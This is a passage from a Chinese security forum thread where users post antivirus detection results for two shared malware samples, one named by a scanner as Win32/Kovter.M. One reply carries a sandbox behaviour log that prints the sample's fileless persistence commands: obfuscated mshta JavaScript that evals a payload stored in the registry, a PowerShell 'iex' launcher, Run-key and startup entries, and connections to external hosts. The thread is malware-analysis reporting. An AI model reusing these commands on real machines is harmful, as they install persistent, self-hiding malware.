收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 [2016.05.14]今日样本2个
123
返回列表 发新帖
楼主: 学雷锋做人
 收起左侧

[病毒样本] [2016.05.14]今日样本2个

  [复制链接]
zq19861019
发表于 2016-5-15 19:22:06 | 显示全部楼层
gdata扫描miss 2
回复

举报

蓝天二号
发表于 2016-5-16 08:14:45 | 显示全部楼层
McAfee



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

liulangzhecgr
发表于 2016-5-16 08:57:22 | 显示全部楼层
系统: win7 x32  防御:applocker

2016/5/16 08:40:46    创建新进程    允许
进程: c:\windows\system32\wbem\wmiprvse.exe
目标: c:\windows\system32\mshta.exe
命令行: "C:\Windows\system32\mshta.exe" javascript:xvzx2YU="V";Y0t=new%20ActiveXObject("WScript.Shell");iumB0wwj="0";MT1O6D=Y0t.RegRead("HKLM\\software\\S9m3pDGSH\\n8lSb7lPOL");ioih2rUNQ3="Q6";eval(MT1O6D);z4EyEFR0="Yrwi0mMM";
规则: [应用程序]*

2016/5/16 08:41:04    创建新进程    允许
进程: c:\windows\system32\mshta.exe
目标: c:\windows\system32\windowspowershell\v1.0\powershell.exe
命令行: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex $env:smmu
规则: [应用程序]*

2016/5/16 08:41:10    向其他进程发送消息    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\windowspowershell\v1.0\powershell.exe
消息: WM_SETICON
规则: [应用程序]*

2016/5/16 08:41:49    向其他进程复制句柄    允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\windowspowershell\v1.0\powershell.exe
句柄: (Event) 0x00000080
规则: [应用程序]*

2016/5/16 08:43:26    创建新进程    允许
进程: g:\download\缉毒卫队2个样本\[1]缉毒卫队.exe
目标: c:\windows\system32\regsvr32.exe
命令行: regsvr32.exe
规则: [应用程序]*

2016/5/16 08:43:33    修改其他进程的线程    允许
进程: g:\download\缉毒卫队2个样本\[1]缉毒卫队.exe
目标: c:\windows\system32\regsvr32.exe
规则: [应用程序]*

2016/5/16 08:43:36    创建新进程    允许
进程: c:\windows\system32\regsvr32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: regsvr32.exe
规则: [应用程序]*

2016/5/16 08:43:46    创建注册表项    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
规则: [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*

2016/5/16 08:43:48    创建新进程    允许
进程: c:\windows\system32\regsvr32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe"
规则: [应用程序]*

2016/5/16 08:43:50    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50290] ->  [106.162.236.99 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:44:01    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\DisableOSUpgrade
值: 0x00000001(1)
规则: [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*

2016/5/16 08:44:02    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50292] ->  [57.158.159.71 : 8080]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:44:09    创建注册表项    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade
规则: [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*

2016/5/16 08:44:11    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50293] ->  [103.249.139.196 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:44:18    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade\ReservationsAllowed
值: 0x00000000(0)
规则: [注册表组]系统设置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Policies\*

2016/5/16 08:44:19    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50294] ->  [163.92.245.8 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:44:31    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
值: mshta javascript:e8JEmr6yP="s8NOPb";X94R=new%20ActiveXObject("WScript.Shell");WmW7eRAt="d";w7lb2d=X94R.RegRead("HKLM\\software\\dfvjvblnd\\agfpi");lj3lsV9n="oKLZwHq";eval(w7lb2d);u7ruXOZmt2="U";
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*

2016/5/16 08:44:33    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50295] ->  [2.27.21.46 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:44:38    删除文件    允许
进程: c:\windows\system32\regsvr32.exe
目标: G:\Download\缉毒卫队2个样本\[1]缉毒卫队.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2016/5/16 08:44:55    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
值: mshta javascript:AnyMPN5="AU";dL2=new%20ActiveXObject("WScript.Shell");i9tkO5whul="U";R4VBl=dL2.RegRead("HKCU\\software\\dfvjvblnd\\agfpi");sAlOy4Vn="3dy";eval(R4VBl);e0epnn3K="5yxdPU7";
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*

2016/5/16 08:44:57    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50296] ->  [120.54.60.164 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:02    创建文件    允许
进程: c:\windows\system32\regsvr32.exe
目标: C:\Users\baba\AppData\Local\ac524ae0\2d53584e.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2016/5/16 08:45:04    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50297] ->  [60.172.249.7 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:08    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_CURRENT_USER\Software\Classes\8a6efcd9\shell\open\command
值: mshta "javascript:I6G8Zutadm="WQ";Qk68=new ActiveXObject("WScript.Shell");drK57JSfWf="vMRLZnVZ";g8e9zs=Qk68.RegRead("HKCU\\software\\dfvjvblnd\\agfpi");jzfaF47L="gHxhVA";eval(g8e9zs);sC4Itw8wGv="3rRwmxQ";"
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Classes\*\command

2016/5/16 08:45:10    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50298] ->  [74.94.119.238 : 443 (https)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:17    修改注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
值: "C:\Users\baba\AppData\Local\ac524ae0\3ae49c91.lnk"
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*

2016/5/16 08:45:20    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50299] ->  [53.69.176.114 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:24    创建文件    允许
进程: c:\windows\system32\regsvr32.exe
目标: C:\Users\baba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\509a4cb9.lnk
规则: [文件组]自动运行程序所在位置 -> [文件]c:\users\baba\appdata\roaming\microsoft\windows\start menu\programs\startup

2016/5/16 08:45:26    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50300] ->  [187.11.65.104 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:28    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50301] ->  [101.233.40.68 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:45:32    删除注册表值    允许
进程: c:\windows\system32\regsvr32.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\htgtuwluht
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*

2016/5/16 08:45:34    访问网络    允许
进程: c:\windows\system32\regsvr32.exe
目标: TCP [本机 : 50302] ->  [91.200.186.5 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2016/5/16 08:46:28    修改其他进程的线程    允许
进程: c:\windows\system32\services.exe
目标: c:\windows\system32\regsvr32.exe
规则: [应用程序]c:\windows\system32\services.exe
回复

举报

wu5920
发表于 2016-5-16 11:10:05 | 显示全部楼层
火绒 Kill 2x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

轩夏
发表于 2016-5-16 14:18:18 | 显示全部楼层
微软

[1]缉毒卫队
Win32/Kovter.M
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 02:56 , Processed in 0.085360 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表